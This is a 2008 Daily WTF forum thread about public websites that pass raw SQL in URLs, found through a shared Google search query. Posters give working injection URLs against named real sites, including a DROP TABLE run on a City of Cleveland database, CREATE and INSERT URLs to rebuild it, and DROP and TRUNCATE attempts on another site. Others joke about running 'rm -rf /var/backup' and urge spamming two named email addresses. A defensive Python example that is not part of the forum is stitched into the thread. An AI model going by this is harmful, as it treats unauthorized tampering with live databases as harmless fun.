The Daily WTF: Curious Perversions in Information Technology

SQL injection madness

Last post 05-05-2008 9:53 AM by ammoQ. 66 replies.
Page 1 of 2 (67 items)
  • 04-22-2008 8:29 PM

    SQL injection madness

    The following Google query returns some fantastic results (thousands of them):

     inurl:select inurl:where inurl:%20

  • 04-22-2008 8:48 PM In reply to

    Re: SQL injection madness

    Wow! I hope Bobby Tables doesn't visit any of those websites.
    The sentence to the right is true. The sentence to the left is false.
  • 04-22-2008 9:03 PM In reply to

    Re: SQL injection madness

    Bah! I've entirely failed to drop any tables at all.

    Not that I tried, of course.

    I especially didn't try on the United Nations homepage.

  • 04-22-2008 9:09 PM In reply to

    Re: SQL injection madness

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

    [Microsoft][ODBC SQL Server Driver][SQL Server]User does not have permission to perform this operation on table 'Restaurantes'.

    /Gastronomia/RestaurantesI.asp, line 204


    I think the problem is that all the sites vulnerable enough to be fun have already been entirely destroyed by the many and varied evils of the internet.
  • 04-23-2008 12:47 AM In reply to

    Re: SQL injection madness

    Shit shit shit, though I hate to admit it, I dropped a table on the City of Cleveland's website.

      http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=SELECT+Ward%2C+PPN%2C+Street_Number%2C+Street_Name%2C+Frontage_of_Parcel%2C+Depth_of_Parcel%2C+Sqfeet++++%0D%0AFROM+cityport%0D%0AWHERE+Buildescr+%3D+'Non-Buildable'+and+Ward+in+(12%2C+13%2C+14%2C+15%2C+16%2C+17%2C+18%2C+19%2C+20%2C+21)&sql_order=+order+by+'Ward'+ASC&pos=120 turned into

    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=DROP TABLE cityport

    Am I going to jail now? Maybe I can find a google cache of the database and manually restore it.

    WHO USES sql_querys in the URL and FURTHERMORE who the hell gives that user FULL DATABASE ACCESS, why not just read on certain tables.

    The sad AND scary thing is that most of the results I get from that google search are for GOVERNMENT websites. Who the hell are they contracting to do their web work?

  • 04-23-2008 1:37 AM In reply to

    Re: SQL injection madness

    You've got to be kidding me.

    Stumbled onto this gem too..

    http://cd.city.cleveland.oh.us/scripts/LandbankReports.05232007 

  • 04-23-2008 1:43 AM In reply to

    Re: SQL injection madness

    You know, I thought you must be joking or something at first, until I went to that site myself and did a search on all records, and it didn't turn up anything. Wow.

    Way to go, random Cleveland site.  You have the worst security I've seen in my life, and have just paid for it.  Do a better job next time.

  • 04-23-2008 1:58 AM In reply to

    • Paddles
    • Not Ranked
    • Joined on 11-11-2007
    • Australia
    • Posts 16

    Re: SQL injection madness

    Bladezor:
    The sad AND scary thing is that most of the results I get from that google search are for GOVERNMENT websites. Who the hell are they contracting to do their web work?

    The lowest bidder. Enough said.

  • 04-23-2008 2:56 AM In reply to

    Re: SQL injection madness

    Ok, I did what I could to "restore" their database.

    Recreate the table:

    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&sql_query=CREATE TABLE landbank.cityport (Ward TEXT NOT NULL, PPN TEXT NOT NULL ,Street_Number TEXT NOT NULL, Street_Name TEXT NOT NULL, Frontage_of_Parcel TEXT NOT NULL, Depth_of_Parcel TEXT NOT NULL, Sqfeet TEXT NOT NULL, Buildescr TEXT NOT NULL)

    Populate it:

    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("18","00515009","3091","W%20106TH%20ST","25","105","2625","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01919053","0","WANDA%20AVE","40","112","4480","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01917012","0","BELLAIRE%20RD","64","65","4160","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01917011","0","BELLAIRE%20RD","40","99","3960","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01916150","0","LEEILA%20AVE","40","111","4440","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01916149","0","LEEILA%20AVE","40","111","4440","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01826053","0","BROOKLAWN%20AVE","297","73","21681","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01826052","0","BROOKLAWN%20AVE","71","52","3692","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02225081","0","VICTORY%20BLVD","61","89","5429","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02225080","0","VICTORY%20BLVD","62","110","6820","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02225079","0","VICTORY%20BLVD","68","119","8092","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02225034","0","W%20140%20ST","21","232","4872","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02225078","0","VICTORY%20BLVD","60","113","6780","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02010091","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009088","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009087","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009086","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009085","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009084","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009083","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009082","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009081","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009080","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
    http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009079","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")

    Good enough..?

  • 04-23-2008 3:18 AM In reply to

    Re: SQL injection madness

    Ugh, one of you guys dropped the table again..I'm not fixing it again..
  • 04-23-2008 4:06 AM In reply to

    • bobday
    • Top 150 Contributor
    • Joined on 04-04-2005
    • Notbugville
    • Posts 175

    Re: SQL injection madness

    http://www.websahara.de/query.php?query=select+[snip]+from+land%2C+bild+where+[snip]&start=20&showrow=5 

    You can abuse this to show more records, but when you try to DROP the table with

    http://www.websahara.de/query.php?query=DROP+TABLE+land+%2c+bild&start=0&showrow=5

    you will get:

    hahaha

  • 04-23-2008 6:07 AM In reply to

    • t-bone
    • Top 500 Contributor
    • Joined on 09-07-2005
    • .be
    • Posts 67

    Re: SQL injection madness

    bobday:

    http://www.websahara.de/query.php?query=select+[snip]+from+land%2C+bild+where+[snip]&start=20&showrow=5 

    You can abuse this to show more records, but when you try to DROP the table with

    http://www.websahara.de/query.php?query=DROP+TABLE+land+%2c+bild&start=0&showrow=5

    you will get:

    It's just searching for some substrings like delete or drop, but it appears security is enforced properly:

    http://www.websahara.de/query.php?query=truncate%20table+land

    It didn't catch the query, but you get an Access denied for user: 'websahara@localhost' to database 'websahara'
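    Two points in this thread belong side by side: Bladezor asking why the web user has full database access rather than read on certain tables, and t-bone noting that the websahara page only searches for substrings like delete or drop while the thing that actually protects it is the Access denied from the database. The following is an added example, not code from the thread or from any of the sites it mentions. It uses SQLite's read-only connection mode as a stand-in for a database account granted SELECT and nothing else; the table layout is borrowed from the columns quoted above, and every row value is constructed for this example.

```python
import os
import re
import sqlite3
import tempfile

# Constructed sample rows, shaped like the columns of the "cityport" table quoted
# in the thread; every value here is made up for this example.
SAMPLE_ROWS = [
    ("18", "10000001", "100", "EXAMPLE ST", "25", "105", "2625", "Non-Buildable"),
    ("19", "10000002", "0", "SAMPLE AVE", "40", "112", "4480", "Non-Buildable"),
    ("20", "10000003", "0", "TEST BLVD", "61", "89", "5429", "Buildable"),
]

# A keyword blacklist of the kind the websahara post describes: it only knows
# a couple of verbs, so any statement it does not list passes straight through.
BLACKLIST = re.compile(r"\b(delete|drop)\b", re.IGNORECASE)


def blacklist_allows(sql: str) -> bool:
    """True when the naive substring filter would let the statement through."""
    return BLACKLIST.search(sql) is None


def create_database(path: str) -> None:
    """Create and populate the table as the privileged owner (a maintenance
    step, not something the web tier should ever be able to do)."""
    conn = sqlite3.connect(path)
    try:
        conn.execute(
            "CREATE TABLE cityport (Ward TEXT, PPN TEXT, Street_Number TEXT,"
            " Street_Name TEXT, Frontage_of_Parcel TEXT, Depth_of_Parcel TEXT,"
            " Sqfeet TEXT, Buildescr TEXT)"
        )
        conn.executemany("INSERT INTO cityport VALUES (?,?,?,?,?,?,?,?)", SAMPLE_ROWS)
        conn.commit()
    finally:
        conn.close()


def open_readonly(path: str) -> sqlite3.Connection:
    """The web-facing connection. SQLite's ?mode=ro stands in for a database
    account that has been granted SELECT and nothing else."""
    return sqlite3.connect(f"file:{path}?mode=ro", uri=True)


def parcels_in_wards(conn: sqlite3.Connection, wards, buildescr: str):
    """The report query the page should have exposed: fixed SQL text, with the
    user's input bound as parameters rather than spliced into the statement."""
    wards = list(wards)
    placeholders = ",".join("?" for _ in wards)
    sql = (
        "SELECT Ward, PPN, Street_Name FROM cityport"
        f" WHERE Buildescr = ? AND Ward IN ({placeholders}) ORDER BY Ward"
    )
    return conn.execute(sql, (buildescr, *wards)).fetchall()


def attempt_write(conn: sqlite3.Connection, sql: str):
    """Run a statement on the read-only connection and report the refusal.
    Returns the database's error text, or None if the write went through."""
    try:
        conn.execute(sql)
        conn.commit()
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


def demo() -> dict:
    """Exercise both layers and return the observations as a dict."""
    path = os.path.join(tempfile.mkdtemp(), "landbank.db")
    create_database(path)
    conn = open_readonly(path)
    try:
        return {
            # The filter catches the verb it was written for ...
            "filter_blocks_drop": not blacklist_allows("DROP TABLE cityport"),
            # ... and misses one it was not, exactly as the thread observed.
            "filter_misses_truncate": blacklist_allows("TRUNCATE TABLE cityport"),
            # The legitimate report still works through the read-only account.
            "readonly_rows": len(parcels_in_wards(conn, ["18", "19"], "Non-Buildable")),
            # A quote in the input is just data to a bound parameter: no match.
            "quoted_ward_rows": len(parcels_in_wards(conn, ["18' OR '1'='1"], "Non-Buildable")),
            # The grant, not the filter, is what actually stops the drop.
            "write_refused": attempt_write(conn, "DROP TABLE cityport"),
            "rows_after_attempt": conn.execute("SELECT COUNT(*) FROM cityport").fetchone()[0],
        }
    finally:
        conn.close()


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

    The blacklist is kept in the example only to show where it falls short; the two controls that matter are the fixed query with bound parameters, so the URL never carries SQL at all, and the SELECT-only account, so a statement that does slip through has nothing it is allowed to destroy.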
  • 04-23-2008 7:12 AM In reply to

    • TheRider
    • Top 150 Contributor
    • Joined on 03-01-2005
    • Zurich, Switzerland
    • Posts 195

    Re: SQL injection madness

    I just noticed this page in the search results:

    http://www.sleep-in.ch/suchergebnis_gast.php?zoneid=10&katid=&minpers=&lang=d&Anfangsposition=40&abfrage=SELECT+i_id%2Ci_name%2Ci_vorname%2Ccb.bez+as+cod_bez%2Csubstring(value%2C1%2C20)+as+l_value%2Ci_max_personen%2Ci_zeitraum_von%2Ci_zeitraum_bis%2C+zb.bezeichnung+as+z_bez%2Ci_bemerkung%2CUNIX_TIMESTAMP(i_mutiert_am)+as+mutdat%0D%0A+++++++++++++FROM+inserate%2C+codes+co%2C+codebez+cb%2C+countries+c%2C+zonen+z%2C+zonenbez+zb%0D%0A++++++++++++where+i_rubrik_cod_id+%3D+100%0D%0A++++++++++++++and+i_typ_cod_id+%3D+200%0D%0A++++++++++++++and+i_status_cod_id+%3D+900%0D%0A++++++++++++++and+i_kat_cod_id+%3D+co.cod_id%0D%0A++++++++++++++and+co.cod_id+%3D+cb.cod_id%0D%0A++++++++++++++and+cb.spr_id+%3D+'d'+%0D%0A++++++++++++++and+i_land+%3D+c.id+%0D%0A++++++++++++++and+i_z_id+%3D+z.z_id%0D%0A++++++++++++++and+z.z_id+%3D+zb.z_id%0D%0A++++++++++++++and+zb.spr_id+%3D+'d'+and+i_z_id+in+('3'%2C'11'%2C'12'%2C'13')+order+by+cod_bez%2C+UNIX_TIMESTAMP(i_mutiert_am)+desc+&PHPSESSID=3b40f967208e224666840320c4a51273

    and now I remember having read about that site in the local newspapers a few days ago. They were reported to have lost records last Friday, and the operators restored to the last backup. Shall I help them test their backup/restore procedure once again?  :-)

    "correcting wrongs on the internet is like subtracting 1 from infinity"
  • 04-23-2008 7:18 AM In reply to

    • TheRider
    • Top 150 Contributor
    • Joined on 03-01-2005
    • Zurich, Switzerland
    • Posts 195

    Re: SQL injection madness

     BTW, this is what they report under "Aktuell" == "news":

    In der Nacht vom Sonntag, 20. April auf Montag 21. April 2008 wurde sleep-in.ch Opfer eines Hacker-Angriffs.

    Dabei wurden alle Angebote der über 2800 Gastgeber und Gäste gezielt gelöscht. Sleep-In konnte mit wenigen Ausnahmen alle Inserate wiederherstellen (Stand Sonntag Morgen). Sleep-In entschuldigt sich bei seinen Gastgeber und Gästen und arbeitet mit Hochdruck daran, dass sich dieser Vorfall nicht wiederholen kann.

    Aber natürlich sind wir verärgert und enttäuscht.

    Trotzdem: Auf eine gfreute Euro08!

    Translates to

    During the night of Sunday, April 20 to Monday, April 21, sleep-in.ch became the victim of a hacker attack.

    Thereby, all offers of more than 2800 hosts and guests have been deleted on purpose. Sleep-in was able to restore all ads with only a few exceptions (status as of Sunday morning). Sleep-In is apologizing to all hosts and guests and is working with high pressure to not let this incident repeat itself.

    But of course, we are angry and disappointed.

    Still: Enjoy a happy Euro08! 

    Now, what do we say!
  • 04-23-2008 7:29 AM In reply to

    • t-bone
    • Top 500 Contributor
    • Joined on 09-07-2005
    • .be
    • Posts 67

    Re: SQL injection madness

    TheRider:

     BTW, this is what they report under "Aktuell" == "news":

    During the night of Sunday, April 20 to Monday, April 21, sleep-in.ch became the victim of a hacker attack.

    Thereby, all offers of more than 2800 hosts and guests have been deleted on purpose. Sleep-in was able to restore all ads with only a few exceptions (status as of Sunday morning). Sleep-In is apologizing to all hosts and guests and is working with high pressure to not let this incident repeat itself.

    But of course, we are angry and disappointed.

    Still: Enjoy a happy Euro08! 

    Now, what do we say!

    They only do nightly backups, people should delete their records in the evening 

  • 04-23-2008 7:33 AM In reply to

    Re: SQL injection madness

    " aah!! h4xx0rs!! "

    "up and down, back and forth, faster, faster.."
  • 04-23-2008 8:11 AM In reply to

    Re: SQL injection madness

    Bladezor:
    hate on cleveland
    It's funny because they deserve it, being from Cleveland and all.

    I guess I'm back.

    Please continue to spam the addresses below.

    PLEASE SPAM:
    jtobin@ohioinstituteofhealthcareers.edu
    jtobin@ohiobusinesscollege.edu
  • 04-23-2008 9:03 AM In reply to

    Re: SQL injection madness

    Bladezor:
    Ugh, one of you guys dropped the table again..I'm not fixing it again..
    I get the feeling that by the end of the day their database is going to be in a sad state of affairs.

    "Void* is not actually void*" - Best error message EVER!

    My method of measuring code quality is to ask myself if I would rather have herpes or maintain the code in question. In this case I would choose death by herpes. --akatherder

    People who work in VB or any variant thereof are not programmers, they are circus chimps throwing feces into an IDE... --chebrock

    My dad chased him off with a shotgun, which apparently pissed this guy off so much he felt the need to strip naked, sit in the middle of his front yard, and chop up live kittens with a machete to feed to his pet boa.
  • 04-23-2008 10:27 AM In reply to

    • t-bone
    • Top 500 Contributor
    • Joined on 09-07-2005
    • .be
    • Posts 67

    Re: SQL injection madness

    galgorah:

    Bladezor:
    Ugh, one of you guys dropped the table again..I'm not fixing it again..
    I get the feeling that by the end of the day their database is going to be in a sad state of affairs.

    Bonus points if someone succeeds in executing rm -rf /var/backup :) 

  • 04-23-2008 10:55 AM In reply to

    Re: SQL injection madness

    t-bone:
    Bonus points prison rape if someone succeeds in executing rm -rf /var/backup :) 

    FTFY.

    < pstorer> Bans don't mean shit on the forum. It's like being on the Sex Offender List. You can still entice kids into your van with candy.

    Want more? Go the IRC channel #TDWTFMafia on irc.slashnet.org.

    Farmer Brown is MasterPlanSoftware. He created a new forum account because he is obsessed with me after I scorned him. Ignoring his trolling is the best way to deal with the crybaby.
  • 04-23-2008 11:49 AM In reply to

    • KNY
    • Not Ranked
    • Joined on 07-19-2006
    • Posts 27

    Re: SQL injection madness

    belgariontheking:

    Sig: To fill your mind with knowledge, we must start by emptying it

    That's really funny, considering the context of this thread. 

  • 04-23-2008 1:39 PM In reply to

    Re: SQL injection madness

    Looks like they took it offline, or someone dropped the database(s)

  • 04-23-2008 2:08 PM In reply to

    Re: SQL injection madness

    Xiphonex:

    Looks like they took it offline, or someone dropped the database(s)

    I guess I should have added earlier to my above post "Or it may not exist at all!"
  • 04-23-2008 8:47 PM In reply to

    • mtill
    • Not Ranked
    • Joined on 04-24-2008
    • Posts 1

    Re: SQL injection madness